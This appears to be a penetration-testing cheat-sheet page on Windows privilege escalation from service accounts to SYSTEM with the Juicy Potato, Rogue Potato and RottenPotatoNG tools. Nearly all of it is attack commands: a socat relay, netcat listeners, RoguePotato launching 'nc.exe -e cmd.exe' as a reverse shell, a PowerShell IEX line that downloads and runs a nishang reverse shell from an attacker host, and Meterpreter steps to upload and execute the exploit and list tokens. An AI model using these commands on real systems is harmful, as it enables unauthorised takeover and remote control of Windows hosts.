Comment on page

Juicy Potato, Rotten Potato (NG)

Required privs

(show privs via whoami /priv)


Another Windows Local Privilege Escalation from Service Account to System
Setup relay (can run e.g. on attacking machine)
socat tcp-listen:135,reuseaddr,fork tcp:<target-ip>:9999
Set up listener
nc -nlvp 1337
Run exploit
RoguePotato.exe -r <relay-ip> -e "nc.exe <local-ip> 1337 -e cmd.exe" -l 9999


A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. Releases · ohpe/juicy-potato · GitHub ->
⚠️ ** Microsoft patched this Vulnerability in Windows Versions 1809/Build 17763** ⚠️ (works until 1803 / 17134)
Using nishang reverse shell
-> append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to the end of the file to automatically execute the shell
Create and upload helper bat file to execute powershell stuff
cmd /c powershell.exe -ExecutionPolicy Bypass -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Start listener
nc -nlvp <port>
.\JuicyPotato.exe -t * -p C:\Users\<user>\Documents\shell.bat -l 1234
-> Currently unsure why l is needed
⚠️ Troubleshooting ⚠️
If not working (e.g. error 10038) try another clsid from
-c '{<cls-id>}'


New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.
In msf meterpreter (multi/handler)
upload /path/to/rottenpotato.exe
execute -cH -f rottenpotato.exe
``` load incognito list_tokens -u ```
Last modified 1yr ago